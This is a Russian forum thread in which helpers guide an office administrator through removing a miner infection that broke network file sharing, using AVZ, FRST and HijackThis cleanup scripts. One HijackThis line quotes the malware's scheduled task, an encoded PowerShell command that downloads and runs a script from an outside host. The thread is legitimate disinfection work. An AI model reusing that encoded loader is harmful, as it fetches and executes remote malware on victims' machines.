Закрыто Пропал общий доступ

Статус
В этой теме нельзя размещать новые ответы.

qvaqsha

Новый пользователь
Сообщения
21
Реакции
1
Доброго времени суток.
Не работает общий доступ к папкам на сервере у половины компов не работает
нашёл майнер, запустил нужные службы но доступ не работает.
Помогите пожалуйста починиться, не хочется ночь в офисе сидеть переустанавливать винды
 

Вложения

  • CollectionLog-2019.12.25-15.24.zip
    44.9 KB · Просмотры: 3
запустил нужные службы но доступ не работает.
Сами отключали до этого?

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ из папки Autologger (Файл - Выполнить скрипт):
Код:
  begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
 SetServiceStart('SeHaeSees', 4);
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\_ctypes.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\_hashlib.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\_socket.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\_ssl.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_ARC4.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_raw_aes.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_raw_cbc.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_raw_cfb.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_raw_ctr.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_raw_des.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_raw_des3.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_raw_ecb.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_raw_ocb.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_raw_ofb.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_Salsa20.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Hash\_BLAKE2s.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Hash\_ghash_clmul.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Hash\_ghash_portable.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Hash\_MD4.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Hash\_MD5.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Hash\_SHA1.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Hash\_SHA256.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Protocol\_scrypt.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Util\_cpuid_c.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Util\_strxor.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19~2\select.pyd', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19842\MSVCR90.dll', '');
 QuarantineFile('C:\Windows\TEMP\_MEI19842\python27.dll', '');
 QuarantineFile('C:\Windows\temp\SecurityDig.exe', '');
 QuarantineFile('C:\Windows\Temp\SecurityHaelth.exe', '');
 QuarantineFile('c:\windows\temp\securityhaelthexec.exe', '');
 QuarantineFile('C:\Windows\Temp\SecurityHaelthRun.exe', '');
 QuarantineFile('c:\windows\temp\securityhaelthservice.exe', '');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\_ctypes.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\_hashlib.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\_socket.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\_ssl.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_ARC4.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_raw_aes.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_raw_cbc.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_raw_cfb.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_raw_ctr.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_raw_des.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_raw_des3.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_raw_ecb.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_raw_ocb.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_raw_ofb.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Cipher\_Salsa20.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Hash\_BLAKE2s.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Hash\_ghash_clmul.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Hash\_ghash_portable.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Hash\_MD4.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Hash\_MD5.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Hash\_SHA1.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Hash\_SHA256.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Protocol\_scrypt.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Util\_cpuid_c.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\Cryptodome\Util\_strxor.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19~2\select.pyd', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19842\MSVCR90.dll', '32');
 DeleteFile('C:\Windows\TEMP\_MEI19842\python27.dll', '32');
 DeleteFile('C:\Windows\temp\SecurityDig.exe', '64');
 DeleteFile('C:\Windows\Temp\SecurityHaelth.exe', '64');
 DeleteFile('c:\windows\temp\securityhaelthexec.exe', '32');
 DeleteFile('C:\Windows\Temp\SecurityHaelthRun.exe', '32');
 DeleteFile('c:\windows\temp\securityhaelthservice.exe', '32');
 DeleteService('SeHaeSees');
 DeleteSchedulerTask('AutDnsScan');
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3);
BC_ImportALL;
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
BC_Activate;
RebootWindows(true);
end.
Компьютер перезагрузится.

После перезагрузки, выполните такой скрипт:

Код:
begin
DeleteFile(GetAVZDirectory+'quarantine.7z');
ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine .\Quarantine\*', 1, 300000, false);
end.

Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 10 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: malware в теле письма.

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):
Код:
O22 - Task: AutFree - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AYgBpAG4AZwAuAHAAcgBvAHQAbwBwAG8AdwBlAHIALgBpAGMAdQAvAGMAbwBrADkALgBqAHMAJwApAA==

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 
Сами отключали до этого?
нет их похоже вирус вырубал, т.к. я их включал а после перезагрузки они снова отключенные были
 
В логах есть профильный софт который может вызывать такие симптомы.

2 - Task: start egais - C:\run\start_egais.bat - ваше?
 
В логах есть профильный софт который может вызывать такие симптомы.

2 - Task: start egais - C:\run\start_egais.bat - ваше?
Да это просто запуск служб УТМ ЕГАИС.
Логи прикрепил
 

Вложения

  • Addition.txt
    30.4 KB · Просмотры: 1
  • FRST.txt
    20.1 KB · Просмотры: 1
В логах уже чисто. Пробуйте запустить службы и проверять сеть, а так дочистим немного мусора.

Сами добавляли политики?
HKLM Group Policy restriction on software: *cscript* <==== ATTENTION
HKLM Group Policy restriction on software: *wscript* <==== ATTENTION

  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Код:
    Start::
    CreateRestorePoint:
    FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe No File
    FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe No File
    FirewallRules: [{3B87E052-106E-4429-BE43-999397795824}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe No File
    FirewallRules: [{D27FBB0D-81AF-4FC9-995F-5E5514A8257F}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe No File
    FirewallRules: [TCP Query User{59DC7654-F28B-4078-A8EF-05AD81C29A12}C:\program files (x86)\cl\comp_name.exe] => (Allow) C:\program files (x86)\cl\comp_name.exe No File
    FirewallRules: [UDP Query User{324A0558-98D2-41B4-A146-62BB85F0EAE7}C:\program files (x86)\cl\comp_name.exe] => (Allow) C:\program files (x86)\cl\comp_name.exe No File
    EmptyTemp:
    Reboot:
    End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.
 
Карантин отправил на почту
 
Карантин получил и отправил в обработку.
 
В логах уже чисто. Пробуйте запустить службы и проверять сеть, а так дочистим немного мусора.

Сами добавляли политики?
HKLM Group Policy restriction on software: *cscript* <==== ATTENTION
HKLM Group Policy restriction on software: *wscript* <==== ATTENTION

  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Код:
    Start::
    CreateRestorePoint:
    FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe No File
    FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe No File
    FirewallRules: [{3B87E052-106E-4429-BE43-999397795824}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe No File
    FirewallRules: [{D27FBB0D-81AF-4FC9-995F-5E5514A8257F}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe No File
    FirewallRules: [TCP Query User{59DC7654-F28B-4078-A8EF-05AD81C29A12}C:\program files (x86)\cl\comp_name.exe] => (Allow) C:\program files (x86)\cl\comp_name.exe No File
    FirewallRules: [UDP Query User{324A0558-98D2-41B4-A146-62BB85F0EAE7}C:\program files (x86)\cl\comp_name.exe] => (Allow) C:\program files (x86)\cl\comp_name.exe No File
    EmptyTemp:
    Reboot:
    End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.
Политики сам добавил. Это запрет на запуск wscript и cscript.
 

Вложения

  • Fixlog.txt
    3.1 KB · Просмотры: 1
Что с проблемой?
 
Что с проблемой?
Всё сделал, общего доступа нет :( откатываюсь на точку восстановления 20.12.19, один комп помогло, после отката всё заработало, накатил сразу заплатки которые вы советовали по "Mysa", может ещё какие заплатки надо накатить?
 
Как альтернатива можно пробовать восстановить

Бекап обязателен, т.к. в некоторых случаях (крайне редких) может положить систему.

По поводу заплаток тут поможет SecurityCheck by glax24, а в случае с серверным ПО, то скрипт AVZ

Выполните скрипт в AVZ при наличии доступа в интернет:

Код:
var
LogPath : string;
ScriptPath : string;

begin
LogPath := GetAVZDirectory + 'log\avz_log.txt';
if FileExists(LogPath) Then DeleteFile(LogPath);
ScriptPath := GetAVZDirectory +'ScanVuln.txt';

  if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else begin
    if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath) else begin
       ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!');
       exit;
      end;
  end;
if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false)
end.
После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt со ссылками на обновления системы и критичных к безопасности программ, которые нужно загрузить и установить. В первую очередь это относится к Java Runtime Environment, Adobe Reader и Adobe Flash Player, это программы, уязвимостями в которых наиболее часто пользуются для внедрения зловредов в систему.
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху Снизу